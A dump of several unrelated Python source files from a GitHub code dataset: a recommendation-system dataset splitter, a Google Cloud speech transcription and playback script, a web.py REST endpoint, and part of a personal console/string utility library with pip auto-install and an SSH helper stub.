| John11Dark/SecurityGuard | Assets/SVG/Smart_Car_Server/app.py | app.py | py | 27,452 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "Python.Motor.Motor",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "Python.servo.Servo",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "Python.ReadVoltages.Adc",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "Python.... |
26213405914 | from typing import Generator, Any
import numpy as np
import pandas as pd
from sklearn.model_selection import GroupKFold
from sklearn.preprocessing import LabelEncoder, OrdinalEncoder
from hw2.datasets.base import Dataset
class TrainDataset(Dataset):
    """Train split wrapper around a DataFrame of (msno, song_id, ..., target) rows.

    Provides per-member reduction, masking, sorting, and group/random
    fold generation for training ranking models.
    """

    def reduce_by_members(self, size: int, inplace: bool = False) -> "TrainDataset":
        """Keep at most *size* interactions per member (``msno``)."""
        if not inplace:
            return TrainDataset(self._df).reduce_by_members(size, inplace=True)
        self._df = self._df.groupby("msno").head(size).reset_index(drop=True)
        return self

    def remove_by_mask(self, mask, inplace: bool = False) -> "TrainDataset":
        """Drop every row for which *mask* is True."""
        if not inplace:
            return TrainDataset(self._df).remove_by_mask(mask, inplace=True)
        self._df = self._df[~mask]
        return self

    def sort_by(self, column: str, inplace: bool = False) -> "TrainDataset":
        """Sort rows by *column*.

        Bug fix: the original ignored *column* and always sorted by
        "msno", silently returning wrong order for any other argument.
        """
        if not inplace:
            return TrainDataset(self._df).sort_by(column, inplace=True)
        self._df = self._df.sort_values(by=column)
        return self

    def group_split(self, n_splits: int) -> Generator:
        """Yield (train, test) folds grouped by member.

        Not used anymore — split by query via :meth:`split` instead.
        """
        group_kfold = GroupKFold(n_splits=n_splits)
        data = self._df.drop("target", axis=1)
        groups = data.msno.cat.codes.to_numpy()
        for train_index, test_index in group_kfold.split(data, groups=groups):
            train_dataset = TrainDataset(self._df.iloc[train_index])
            test_dataset = TrainDataset(self._df.iloc[test_index])
            yield train_dataset, test_dataset

    def split(self, n_splits: int, random_state: int) -> Generator:
        """Yield (train, test) folds from a seeded random permutation.

        (msno, song_id) pairs already seen in train are removed from the
        test fold to avoid leakage. The mask construction is slow but
        runs only once per fold.
        """
        np.random.seed(random_state)
        splits = np.array_split(np.random.permutation(len(self._df)), n_splits)
        for i in range(n_splits):
            train_index = np.hstack([splits[j] for j in range(n_splits) if j != i])
            test_index = splits[i]
            train_dataset = self._df.iloc[sorted(train_index)].reset_index(drop=True)
            test_dataset = self._df.iloc[sorted(test_index)].reset_index(drop=True)
            # Remove leaks: drop test rows whose (msno, song_id) pair
            # also appears in train.
            cols = ["msno", "song_id"]
            mask_2d = np.isin(test_dataset[cols], train_dataset[cols])
            test_dataset = test_dataset[~np.all(mask_2d, axis=1)]
            yield TrainDataset(train_dataset), TrainDataset(test_dataset)

    def add_features(self, name: str, values: Any):
        """Attach a feature column *name* holding *values*."""
        self._df[name] = values

    def drop_features(self, name: str):
        """Remove the feature column(s) *name* from the frame."""
        self._df = self._df.drop(columns=name)

    @property
    def queries(self) -> np.ndarray:
        """Integer query (member) codes, one per row."""
        return self._df.msno.cat.codes.to_numpy()

    @property
    def labels(self) -> np.ndarray:
        """Relevance targets, one per row."""
        return self._df.target.to_numpy()

    @staticmethod
    def from_path(path: str) -> "TrainDataset":
        """Load the train CSV with categorical columns and an int target.

        Bug fix: ``np.int`` was a deprecated alias of the builtin ``int``
        and was removed in NumPy 1.24; using ``int`` is behaviorally
        identical on all NumPy versions.
        """
        df = pd.read_csv(path, dtype={
            "msno": "category",
            "song_id": "category",
            "source_system_tab": "category",
            "source_screen_name": "category",
            "source_type": "category",
            "target": int})
        return TrainDataset(df)
| Sushentsev/recommendation-systems | hw2/datasets/train.py | train.py | py | 3,215 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "hw2.datasets.base.Dataset",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "sklearn.model_selection.GroupKFold",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "typing.Generator",
"line_number": 36,
"usage_type": "name"
},
{
"api... |
9803009738 | from __future__ import division
from pydub.utils import make_chunks
import re
import sys
from google.cloud import speech
import pyaudio
from six.moves import queue
from io import BytesIO
from pydub import AudioSegment
from multiprocessing import Process
# You can choose voices from https://cloud.google.com/text-to-speech/docs/voices
voice_choice = "en-US-Wavenet-F"
output_lang_code = re.search("[a-z]{2,3}-[A-Z]{2}", voice_choice).group()
# Audio recording parameters
RATE = 16000
CHUNK = int(RATE / 10) # 100ms
# You can use PyAudio to find the right index for the device you'd like to use
output_device_index = 11
def synthesize_text(text):
    """Synthesize *text* with Google Cloud TTS and play it aloud.

    Uses the module-level ``voice_choice`` / ``output_lang_code`` to pick
    the voice and ``output_device_index`` to pick the playback device.
    The MP3 response is decoded entirely in memory.

    Args:
        text (str): the text to speak.
    """
    # Google Cloud TTS client, imported inside the function as in the
    # upstream Google sample code.
    from google.cloud import texttospeech
    client = texttospeech.TextToSpeechClient()
    input_text = texttospeech.SynthesisInput(text=text)
    # Note: the voice can also be specified by name.
    # Names of voices can be retrieved with client.list_voices().
    voice = texttospeech.VoiceSelectionParams(
        language_code=output_lang_code, name=voice_choice
    )
    audio_config = texttospeech.AudioConfig(
        audio_encoding=texttospeech.AudioEncoding.MP3
    )
    response = client.synthesize_speech(
        request={"input": input_text, "voice": voice, "audio_config": audio_config}
    )
    # The response's audio_content is binary MP3; wrap it in a BytesIO so
    # pydub can decode it without touching the filesystem.
    fp = BytesIO()
    fp.write(response.audio_content)
    fp.seek(0)
    song = AudioSegment.from_file(fp, format="mp3")
    play_from_device(song, output_device_index)
class MicrophoneStream(object):
    """Opens a recording stream as a generator yielding the audio chunks.

    Designed for ``with MicrophoneStream(RATE, CHUNK) as stream:`` usage.
    PyAudio delivers audio on its own callback thread, so chunks are
    handed over through a thread-safe queue and drained by ``generator()``
    on the consumer thread.
    """

    def __init__(self, rate, chunk):
        # rate: sampling rate in Hz; chunk: frames per callback buffer.
        self._rate = rate
        self._chunk = chunk
        # Create a thread-safe buffer of audio data
        self._buff = queue.Queue()
        # Flipped by __enter__/__exit__; generator() stops once closed.
        self.closed = True

    def __enter__(self):
        """Open the PyAudio input stream and start buffering audio."""
        self._audio_interface = pyaudio.PyAudio()
        self._audio_stream = self._audio_interface.open(
            format=pyaudio.paInt16,
            # The API currently only supports 1-channel (mono) audio
            # https://goo.gl/z757pE
            channels=1,
            rate=self._rate,
            input=True,
            frames_per_buffer=self._chunk,
            # Run the audio stream asynchronously to fill the buffer object.
            # This is necessary so that the input device's buffer doesn't
            # overflow while the calling thread makes network requests, etc.
            stream_callback=self._fill_buffer,
        )
        self.closed = False
        return self

    def __exit__(self, type, value, traceback):
        """Stop the stream and unblock any consumer waiting on the queue."""
        self._audio_stream.stop_stream()
        self._audio_stream.close()
        self.closed = True
        # Signal the generator to terminate so that the client's
        # streaming_recognize method will not block the process termination.
        self._buff.put(None)
        self._audio_interface.terminate()

    def _fill_buffer(self, in_data, frame_count, time_info, status_flags):
        """Continuously collect data from the audio stream, into the buffer."""
        self._buff.put(in_data)
        # Input-only stream: return no frames and tell PyAudio to continue.
        return None, pyaudio.paContinue

    def generator(self):
        """Yield concatenated audio chunks until the stream is closed."""
        while not self.closed:
            # Use a blocking get() to ensure there's at least one chunk of
            # data, and stop iteration if the chunk is None, indicating the
            # end of the audio stream.
            chunk = self._buff.get()
            if chunk is None:
                return
            data = [chunk]
            # Now consume whatever other data's still buffered.
            while True:
                try:
                    chunk = self._buff.get(block=False)
                    if chunk is None:
                        return
                    data.append(chunk)
                except queue.Empty:
                    break
            yield b"".join(data)
# modified from pydub's _play_with_pyaudio
def play_from_device(seg, device_index):
    """Play a pydub AudioSegment on the PyAudio output device at device_index."""
    audio = pyaudio.PyAudio()
    out_stream = audio.open(
        format=audio.get_format_from_width(seg.sample_width),
        channels=seg.channels,
        rate=seg.frame_rate,
        output=True,
        output_device_index=device_index,
    )
    # Just in case there were any exceptions/interrupts, we release the resource
    # So as not to raise OSError: Device Unavailable should play() be used again
    try:
        # break audio into half-second chunks (to allows keyboard interrupts)
        for piece in make_chunks(seg, 500):
            out_stream.write(piece._data)
    finally:
        out_stream.stop_stream()
        out_stream.close()
        audio.terminate()
def listen_print_loop(responses):
    """Iterates through server responses and prints them.
    The responses passed is a generator that will block until a response
    is provided by the server.
    Each response may contain multiple results, and each result may contain
    multiple alternatives; for details, see https://goo.gl/tjCPAU. Here we
    print only the transcription for the top alternative of the top result.
    In this case, responses are provided for interim results as well. If the
    response is an interim one, print a line feed at the end of it, to allow
    the next result to overwrite it, until the response is a final one. For the
    final one, print a newline to preserve the finalized transcription.
    """
    num_chars_printed = 0
    for response in responses:
        if not response.results:
            continue
        # The `results` list is consecutive. For streaming, we only care about
        # the first result being considered, since once it's `is_final`, it
        # moves on to considering the next utterance.
        result = response.results[0]
        if not result.alternatives:
            continue
        # Display the transcription of the top alternative.
        transcript = result.alternatives[0].transcript
        # Display interim results, but with a carriage return at the end of the
        # line, so subsequent lines will overwrite them.
        #
        # If the previous result was longer than this one, we need to print
        # some extra spaces to overwrite the previous result
        overwrite_chars = " " * (num_chars_printed - len(transcript))
        if not result.is_final:
            sys.stdout.write(transcript + overwrite_chars + "\r")
            sys.stdout.flush()
            num_chars_printed = len(transcript)
        else:
            print(transcript + overwrite_chars)
            # Bug fix: the original wrote Process(target=synthesize_text(...)),
            # which calls synthesize_text synchronously in this process and
            # hands its return value (None) to Process, so the child process
            # did nothing.  Pass the callable and its argument instead.
            p2 = Process(target=synthesize_text,
                         args=(transcript + overwrite_chars,))
            p2.start()
            num_chars_printed = 0
def main():
    """Stream microphone audio to Cloud Speech and print transcripts."""
    # See http://g.co/cloud/speech/docs/languages
    # for a list of supported languages.
    input_lang_code = "en-US"  # a BCP-47 language tag
    speech_client = speech.SpeechClient()
    recognition_config = speech.RecognitionConfig(
        encoding=speech.RecognitionConfig.AudioEncoding.LINEAR16,
        sample_rate_hertz=RATE,
        language_code=input_lang_code,
    )
    streaming_config = speech.StreamingRecognitionConfig(
        config=recognition_config, interim_results=True
    )
    with MicrophoneStream(RATE, CHUNK) as mic_stream:
        # Wrap each raw audio chunk in a streaming request lazily.
        request_stream = (
            speech.StreamingRecognizeRequest(audio_content=chunk)
            for chunk in mic_stream.generator()
        )
        responses = speech_client.streaming_recognize(streaming_config, request_stream)
        # Now, put the transcription responses to use.
        listen_print_loop(responses)
if __name__ == "__main__":
main() | EHowardHill/speak-easy | basic-runtime.py | basic-runtime.py | py | 7,631 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "re.search",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "google.cloud.texttospeech.TextToSpeechClient",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "google.cloud.texttospeech",
"line_number": 28,
"usage_type": "name"
},
{
"... |
25945686355 | #!/usr/bin/env python
# coding=utf-8
# author = ruiruige
# email = whx20202@gmail.com
import web
from jx3wj.common.rest.rest_base import resources
from jx3wj.common.rest.dto.dto import deco_dump_to_str
from jx3wj.common.log import log as logging
from jx3wj.common.db.crud import select
from jx3wj.common.db.do.item import Item
from jx3wj.common.db.do.base_do import Base_do
from jx3wj.common.utils.web_utils import not_found_utils
from jx3wj.common.utils.web_utils import redirect_utils
from jx3wj.common.rest.response_control import assemble_response
from jx3wj.mgmt.items import items_view
LOG = logging.getLogger(__name__)
# 这两段放在前面以便被引用到
# 处理api相关的url
api_urls = (
"/items", "items"
)
# api相关的子应用
api_app = web.application(api_urls, locals())
# url入口点
urls = (
# 要按顺序,否则"/api/items"这种请求,就走"/"不走"/api"了
"/api", api_app,
"(.*)", not_found_utils.not_found_app,
"/", items_view.app,
"", redirect_utils.add_backslash_app,
)
class reitems(object):
    """Resource that bounces every GET back to the application root."""
    def GET(self):
        # web.seeother is raised, not returned; web.py converts it into a
        # redirect response to "/".
        redirect = web.seeother('/')
        raise redirect
class items(resources):
    """REST resource: GET returns all Item rows through the decorator chain."""
    @assemble_response
    @Base_do.deco_sqlalchemy_obj_to_dict
    @resources.manage_rest_api()
    def GET(self):
        # Fetch every Item row; the decorators (by their names) appear to
        # convert ORM objects to dicts and wrap the standard response
        # envelope — confirm against their definitions.
        rst = select(cls=Item)
        return rst
    def before_response(self, session=None):
        """Do some preparations before response to the REST request.
        inherited from super, This function is run before the doGet doPost etc is run.
        :see: super.before_response
        :raises: None
        """
        cls_name = self.__class__.__name__
        # Class initialisation follows the MRO (Method Resolution Order).
        # NOTE(review): calling super().__init__() from before_response
        # (rather than from __init__) looks deliberate but unusual —
        # confirm against the resources base class.
        super(items, self).__init__()
        LOG.debug("running before_response of class : %s" % cls_name)
# 入口点应用
app = web.application(urls, locals())
| ruiruige/myifttt | myifttt/mgmt/items/items.py | items.py | py | 1,893 | python | en | code | 1 | github-code | 6 | [
{
"api_name": "jx3wj.common.log.log.getLogger",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "jx3wj.common.log.log",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "web.application",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "j... |
41464656819 | #! python3
# -*- coding: utf-8 -*-
import datetime
start_bench_no_bench = datetime.datetime.now()
__version__ = "8.2.8-alpha"
import os
import sys
import copy
import platform
import pkgutil
FRACKING_INPUT_DEBUG = False
# todo version diff
# todo export script as json?
# todo compare jsons?
# todo save changes as commit message?
# this shit for pycharm:
colorama = None; cprint = None; copypaste = None; pyautogui = None; Tk = None; Button = None; mainloop = None; paramiko = None
def get_Bench(start=False):  # return class with those functions:
    """Build and return a fresh Bench timer class.

    Every call returns an independent class object, so several timers can
    run side by side.  Bug fix: the `start` flag used to be ignored; now
    it (re)starts the timer before returning.
    """
    class Bench(object):  # dir ignore
        time_start = datetime.datetime.now()
        time_end = None
        quiet = False  # d argument for disable print to terminal bnl1
        prefix = "Bench runned in"  # d what have been finished, will print if bnl1
        # d "quiet" variable of class is False
        @classmethod
        def start(cls):  # set time of begin to now
            cls.time_start = datetime.datetime.now()
        @classmethod
        def get(cls):  # dir ignore
            # Elapsed seconds as a float.  Bug fix: total_seconds() also
            # counts whole days, which `seconds + microseconds` dropped.
            cls.time_end = datetime.datetime.now()
            delta = cls.time_end - cls.time_start
            return delta.total_seconds()
        @classmethod
        def end(cls):  # return delta between start and end
            delta_combined = cls.get()
            if not cls.quiet:
                try:
                    colorama.init()
                    cprint(cls.prefix + " " + str(round(delta_combined, 2)) + " seconds", "grey", "on_white")
                except (TypeError, AttributeError):
                    # colorama/cprint are None (colour support not loaded):
                    # fall back to a plain print.
                    print(cls.prefix + " " + str(round(delta_combined, 2)) + " seconds")
            return delta_combined
    if start:
        Bench.start()
    return Bench
class OS:
    """Static snapshot of interpreter and OS facts, computed once at import.

    Attributes: is_python3 (bool), python_implementation ("cpython"/"pypy"),
    python_version_major (int), python_commandline_version ("3" or ""),
    family ("nt"/"unix"), name ("windows"/"linux"/"macos"),
    windows_version (Windows only), display, cyrrilic_support.
    """
    is_python3 = sys.version_info >= (3, 0)  # d boolean
    python_implementation = None  # d string with name of python implementation: "cpython" or "pypy"
    python_version_major = sys.version_info.major  # d int of major python version
    python_commandline_version = ""
    if is_python3:
        python_commandline_version = "3"  # d string of addable "3" to commandline apps if python is 3rd version
    family = None  # d string with family of OS: "nt" or "unix"
    name = None  # d string with name of OS: "windows", "linux", or "macos"
    windows_version = None  # d only on Windows, integer of major version of Windows
    display = None  # d didn't work yet
    cyrrilic_support = None  # d boolean variable of cyrrilic output support
    if sys.platform == "linux" or sys.platform == "linux2":
        name = "linux"
    elif sys.platform == "win32" or sys.platform == "cygwin":
        name = "windows"
        windows_version = sys.getwindowsversion().major
    elif sys.platform == "darwin":
        name = "macos"
    # Bug fix: python_implementation is a function and must be *called*;
    # comparing the function object itself to "PyPy" was always False, so
    # PyPy was misreported as "cpython".
    if platform.python_implementation() == "PyPy":
        python_implementation = "pypy"
    else:
        python_implementation = "cpython"
    if name == "windows":
        family = "nt"
    elif name in ["macos", "linux"]:
        family = "unix"
    try:  # todo make this work!
        if name == "linux":
            from Xlib.display import Display
            display = True
    except ImportError:
        display = False
        print("Your system haven't display -_-")
    try:
        # Probe whether the console can encode cyrillic output.
        cyrline = "йцукенгшщзхъфывапролджэячсмитьбюЙЦУКЕНГШЩЗХЪФЫВАПРОЛДЖЭЯЧСМИТЬБЮ"
        for cyrsybol in cyrline:
            print(cyrsybol*2, end="\r")
        print("  ", end="\r")
        cyrrilic_support = True
    except UnicodeEncodeError as err:
        cyrrilic_support = False
        # print (err)
        print ("Your system doesn't properly work with cyrrilic -_-")
class Internal:
    """Bootstrap helpers for commands8 itself: on-demand pip install and
    import, a self-documenting source listing, and a reload helper."""
    @staticmethod
    def mine_import(module_name, objects=None, justdownload=False, az=None):  # import
        # d module, if module not found, trying to install it by pip
        # objects: comma-separated names for "from module import names";
        # az: alias name to bind the module under in globals();
        # justdownload: only install, do not bind anything.
        # check for pip module
        if FRACKING_INPUT_DEBUG: debug_Bench = get_Bench()
        if FRACKING_INPUT_DEBUG: debug_Bench.start()
        def just_install(module_name):
            # Install a single package through pip's programmatic entry point.
            import pip
            pip.main(['install', module_name])
        modules_list = []
        for item in pkgutil.iter_modules():
            modules_list.append(item[1])
        if "pip" not in modules_list:
            if OS.name == "linux":
                os.system("sudo apt-get install python" + OS.python_commandline_version + "-pip")
        if module_name not in modules_list:
            ###########RARE###########
            if module_name == "pyautogui":
                if OS.name == "linux":
                    # NOTE(review): the python-xlib / python3-Xlib branches
                    # look swapped relative to OS.is_python3 — confirm.
                    if OS.is_python3:
                        os.system("apt-get install python-xlib")
                    else:
                        os.system("apt-get install python3-Xlib")
                if OS.name == "macos":
                    for package in ["python" + OS.python_commandline_version + "-xlib",
                                    "pyobjc-core", "pyobjc"]:
                        just_install(package)
                    if OS.python_implementation == "pypy":
                        Print.debug("Yep, PyPy doesn't support pyobjc")
            if module_name in ["win32api","win32con"]:
                just_install("pypiwin32")
            else:
                ###########RARE###########
                just_install(module_name)
        if not justdownload:
            if az and objects:
                # NOTE(review): importlib is referenced on the next line
                # before any "import importlib" in this function — confirm.
                if len(objects.split(",")) == 1:
                    globals()[az] = importlib.import_module(objects[0], package=module_name)
                print("Internal.mine_import doesn't support both attributes use 'az' and 'objects', so only 'objects' will apply.")
                az = None
            if az:
                import importlib
                globals()[az] = importlib.import_module(module_name)
            elif objects:
                # import importlib # todo better code
                # for object in objects.split(",")
                # globals()[object] = importlib.import_module(name, package=module_name):
                #### if " as " in object: split it and bind under the second
                #### name while importing from the first
                exec("from " + module_name + " import " + objects, globals())
            else:
                import importlib
                globals()[module_name] = importlib.import_module(module_name)
        if FRACKING_INPUT_DEBUG: debug_Bench.prefix = module_name + " " + str(objects)
        if FRACKING_INPUT_DEBUG: debug_Bench.end()
    @staticmethod
    def dir_c():  # d print all functionality of commands8
        # Pretty-print commands8's own source: class/def headers plus "# d"
        # doc comments, honouring "# dir ignore" and "bnl<N>" spacing markers.
        first_func_after_class = 1
        cnt_of_all_def = 0
        cnt_of_commented_def = 0
        for line in Str.nl(File.read(Path.extend(Path.commands8(), "commands8.py"))):  # dir ignore
            if "# dir ignore" not in line:  # dir ignore
                if "bnl" in line:  # dir ignore
                    print(newline*Str.get_integers(line)[-1], end="")  # dir ignore
                    line = line.replace("bnl"+str(Str.get_integers(line)[-1]),"")
                if "def " in line:  # dir ignore
                    print(newline*first_func_after_class + line)  # dir ignore
                    first_func_after_class = 1
                    cnt_of_all_def += 1
                    if " # " in line: cnt_of_commented_def += 1
                elif ("class " in line) and (line[0:4] != " "):  # dir ignore
                    first_func_after_class = 0
                    print(newline + line)  # dir ignore
                elif "# d " in line:  # dir ignore
                    print(line.replace("# d ", "# ", 1))  # dir ignore
        Print.debug(cnt_of_all_def, cnt_of_commented_def)
    @staticmethod
    def rel(quiet=False):  # d reload commands8, if you use it not in REPL, activate quiet argument
        # d require additional line of code after reload if you import not entrie commands8
        # d you need manually add "from commands8 import *" to script/REPL
        # d if you import like "import commands8", additional line of code not needed
        import commands8, importlib
        commands8 = importlib.reload(commands8)
        del commands8
        string = "from commands8 import *"  # you need to manually add this string to code :(
        if not quiet:
            print('"'+string+'" copied to clipboard')
        import copypaste
        copypaste.copy(string)
        pass
if OS.display:
if OS.python_implementation != "pypy":
if OS.name != "macos:":
Internal.mine_import("pyautogui", justdownload=True)
Internal.mine_import("paramiko", justdownload=True)
Internal.mine_import("tkinter") # from tkinter import *
import json, \
shutil, \
time, \
random, \
subprocess, \
datetime, \
re, \
ctypes, \
getpass
if OS.name == "windows":
Internal.mine_import("win_unicode_console")
Internal.mine_import("win32api")
Internal.mine_import("win32con")
Internal.mine_import("termcolor")
Internal.mine_import("colorama")
colorama.init()
colorama.deinit()
Internal.mine_import("termcolor", objects="colored, cprint") # print_green_on_cyan = lambda x: cprint(x, 'green', 'on_cyan')
if OS.name == "windows":
Internal.mine_import("pyperclip", az="copypaste")
else:
Internal.mine_import("copypaste")
newline = '\n' # d string with newline bnl3
ruble = u"\u20bd" # d string with ₽ symbol
backslash = "\ "[:1] # d string with backslash
newline2 = "\r\n" # d string with other newline
class Print():
    """Console printing helpers: a loud debug dump and an in-place line."""
    @staticmethod
    def debug(*arguments, raw=False):
        """Print each argument between full-width separator lines; raw=True
        prints repr() instead of str()."""
        separator = "-" * Console.width()
        print("<<<Debug sheet:>>>")
        for item in arguments:
            print(separator, end="")
            print(repr(item) if raw else item)
        print(separator)
        print("<<<End of debug sheet>>>")
    @staticmethod
    def rewrite(*arguments, sep=" ", raw=False):
        """Print a line that the next rewrite() call will overwrite.

        The previous content is blanked first, so a shorter new line does
        not leave stale characters behind.
        """
        blank = " " * Console.width()
        if OS.name == "windows":
            # A full-width line would wrap on Windows consoles.
            blank = blank[:-1]
        print(blank, end="\r")
        print(*arguments, sep=sep, end="\r")
class Str:
    """String helpers: quoting, integer extraction, padding, splitting,
    substring search, diffs and interactive input."""
    @staticmethod
    def to_quotes(some_string):
        """Return the input wrapped in double quotes."""
        return '"' + str(some_string) + '"'
    @staticmethod
    def to_quotes_2(some_string):
        """Return the input wrapped in single quotes."""
        return "'" + str(some_string) + "'"
    @staticmethod
    def get_integers(string):
        """Return the list of integers embedded in string.

        A '-' or '—' immediately before the digits negates the number.
        Floating point values are not supported.
        """
        # todo add support for floating numbers, it will be cool!
        integer_found = False
        integers = []
        current_integer = 0
        negative = False
        for symbol in str(string) + " ":  # trailing space flushes the final number
            try:
                if symbol in ['-', '—']:
                    negative = True
                    continue
                int(symbol)
                current_integer = current_integer*10 + int(symbol)
                integer_found = True
            except ValueError:
                if integer_found:
                    if negative:
                        current_integer = -current_integer
                    integers = integers + [current_integer]
                    current_integer = 0
                    integer_found = False
                    negative = False
        return integers
    @staticmethod
    def newlines_to_strings(string, quiet=False):
        """Split a multi-line string into a list of lines.

        Returns None (optionally printing a notice) for falsy input.
        """
        if string:
            string = str(string)
            if OS.name == "windows":
                strings = string.split(newline2)
                if len(strings) == 1:
                    # Windows text may still use bare \n endings.
                    strings = strings[0].split(newline)
            elif OS.name in ["macos", "linux"]:
                strings = string.split(newline)
            return strings
        else:
            if not quiet:
                print("None can't be splitted")
    @classmethod
    def nl(cls, string):
        """Alias for newlines_to_strings."""
        return cls.newlines_to_strings(string=string)
    @staticmethod
    def split_every(string, chars):
        """Split string into consecutive pieces of at most chars characters."""
        chars = int(chars)
        output_lines = []
        char_exists = "."
        char_can_be_exists = ".?"
        # One mandatory character followed by chars-1 optional ones.
        regexp = char_exists + char_can_be_exists*(chars-1)
        for line in re.findall(regexp, str(string)):
            output_lines += [line]
        return output_lines
    @staticmethod
    def leftpad(string, leng, ch="0", rightpad=False):
        """Pad string on the left with ch up to leng characters.

        Strings already >= leng are returned unchanged; rightpad=True pads
        on the right instead.
        """
        string = str(string)
        if len(string) >= leng:
            return string
        strOfCh = str(ch) * leng
        string_output = strOfCh[len(string):leng] + string
        if rightpad:
            string_output = string + strOfCh[len(string):leng]
        return string_output
    @classmethod
    def rightpad(cls, string, leng, ch="0"):
        """Pad string on the right with ch up to leng characters."""
        return cls.leftpad(string, leng, ch=ch, rightpad=True)
    @staticmethod
    def substring(string, before, after=None, return_after_substring=False):
        """Return the part of string between `before` and `after` (exclusive).

        A missing marker falls back to the start/end of the string.  With
        return_after_substring=True, returns (substring, rest_after_it).
        NOTE(review): with after=None and return_after_substring=True,
        after_substring is unbound and this raises UnboundLocalError —
        pre-existing behaviour, confirm before relying on it.
        """
        startfrom = string.find(before)
        if startfrom != -1:
            startfrom = string.find(before) + len(before)
        else:
            startfrom = 0
        if (after) or (after == ""):
            end_at = string[startfrom:].find(after)
            if end_at != -1:
                end_at = startfrom + string[startfrom:].find(after)
                substring = string[startfrom:end_at]
                after_substring = string[end_at:]
            else:
                substring = string[startfrom:]
                after_substring = ""
        else:
            substring = string[startfrom:]
        if return_after_substring:
            return substring, after_substring
        return substring
    @staticmethod
    def diff_simple(string_a, string_b):
        """Print a character-level diff between the two strings.

        Not all mine code, must rewrite.
        """
        # todo rewrite this shit.
        import difflib
        strings = [(string_a, string_b)]  # for furthurer support for unlimited srtings
        for a, b in strings:
            print('{} => {}'.format(a, b))
            for i, s in enumerate(difflib.ndiff(a, b)):
                if s[0] == ' ':
                    continue
                elif s[0] == '-':
                    print(u'Delete "{}" from position {}'.format(s[-1], i))
                elif s[0] == '+':
                    print(u'Add "{}" to position {}'.format(s[-1], i))
            print()
    @staticmethod
    def input_pass(string="Password:"):
        """Prompt for a password without echoing it (getpass)."""
        return getpass.getpass(string)
    @staticmethod
    def input_int(message="Input integer: ", minimum=None, maximum=None, default=None, quiet=False):
        """Prompt until the user enters a valid integer and return it.

        Empty input returns `default` when one was given; out-of-range or
        non-numeric input re-prompts.  Bug fixes: the old code compared the
        builtin `int` type (not the entered value) with minimum/maximum,
        had an unreachable default branch, and raised an uncaught
        ValueError instead of re-prompting on empty input.
        """
        output_int = "jabla fitta"  # sentinel: loop until replaced
        if default:
            # NOTE(review): this replaces the prompt instead of appending
            # to it — kept as-is for backward compatibility.
            message = "(Enter = " + str(default) + ")"
        while output_int == "jabla fitta":  # loop until a final number is produced
            raw = input(message)
            if raw != "":
                try:
                    integer = Str.get_integers(raw)[0]
                except IndexError:  # no digits at all in the input
                    print("Это не число")
                    continue
            elif default:
                # Empty input with a default: accept the default.
                output_int = default
                break
            else:
                # Empty input and no default: re-prompt.
                print("Это не число")
                continue
            if minimum:
                if integer < minimum:
                    print("Число должно быть больше", minimum)
                    continue
            if maximum:
                if integer > maximum:
                    print("Число должно быть меньше", maximum)
                    continue
            output_int = integer
            break
        if not quiet:
            print("Итоговое число:", output_int)
        return output_int
class Console():
    """Terminal helpers: clearing the screen, size queries, a colour
    "blink" toy, and capturing shell command output."""
    @staticmethod
    def clean():  # wipe terminal output. Not tested on linux
        # todo test on linux
        if OS.name == "windows":
            os.system("cls")
        elif OS.name == "linux":
            # Scroll everything off-screen instead of shelling out.
            print(newline * shutil.get_terminal_size().lines)
        elif OS.name == "macos":
            # clear plus the \e[3J escape, which also wipes scrollback.
            os.system(r"clear && printf '\e[3J'")
    @staticmethod
    def width():  # return width of terminal window in characters
        # NOTE(review): on an unrecognised OS.name width_ is never bound
        # and the final int() raises UnboundLocalError — confirm intended.
        if OS.name == "windows":
            io = Console.get_output("mode con")
            width_ = Str.get_integers(io)[1]
        elif OS.name in ["linux", "macos"]:
            io = Console.get_output("stty size")
            width_ = Str.get_integers(io)[1]
        return int(width_)
    @staticmethod
    def height():  # return height of terminal window in characters
        if OS.name == "windows":
            modecon = Console.get_output("mode con")
            height = Str.get_integers(modecon)[0]
        elif OS.name in ["linux", "macos"]:
            sttysize = Console.get_output("stty size")
            height = Str.get_integers(sttysize)[0]
        # Cap the reported height (avoids huge scrollback values).
        if height > 100:
            height = 100
        return int(height)
    @classmethod
    def blink(cls, width=None, height=None, symbol="#", sleep=0.5):
        # d fastly print to terminal characters with random color. Completely shit.
        # d arguments width and height changing size of terminal, works only in
        # d Windows.
        # Runs until KeyboardInterrupt, then cleans the screen and returns.
        if width is not None and height is not None:
            os.system("mode con cols=" + str(width) + " lines=" + str(height))
        if width is None:
            width = cls.width()
        if height is None:
            height = cls.height()
        colorama.reinit()
        while True:
            colors = ["grey", "red", "green", "yellow", "blue", "magenta", "cyan", "white"]
            highlights = ["on_grey", "on_red", "on_green", "on_yellow", "on_blue", "on_magenta", "on_cyan", "on_white"]
            string = symbol * width
            color = random.choice(colors)
            colors.pop(colors.index(color))
            highlight = random.choice(highlights)
            try:  # New version with one long line. Works perfect, as I see.
                string = string * height
                print(termcolor.colored(string, color, highlight))
                time.sleep(sleep)
            except KeyboardInterrupt as err:
                print(termcolor.colored("OK", "white", "on_grey"))
                colorama.deinit()
                cls.clean()
                break
    @staticmethod
    def get_output(command, quiet=True, split_lines=False):  # d return output
        # d of executing command. Doesn't output it to terminal in realtime.
        # d can be output after finished if "quiet" argument activated.
        # Returns combined stdout+stderr, optionally split into lines.
        p = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)
        if OS.name == "windows":
            # cp866: the OEM code page of the author's Windows console.
            output = p.decode("cp866")
        elif OS.family == "unix":
            output = p.decode("utf8")
        if split_lines:
            output = Str.nl(output)
        return output
class Ssh:
    """Minimal SSH helpers built on paramiko (password authentication only)."""
    @staticmethod
    def get_output(host, username, password, command, safe=False):
        """Run `command` on the SSH server and return its stdout as str.

        Raises IOError when the command wrote to stderr, unless safe=True.
        """
        # todo autorisation by key.
        if OS.python_implementation != "pypy":
            Internal.mine_import("paramiko")
        else:
            raise OSError("paramiko doesn't supported by PyPy")
        ssh = paramiko.SSHClient()
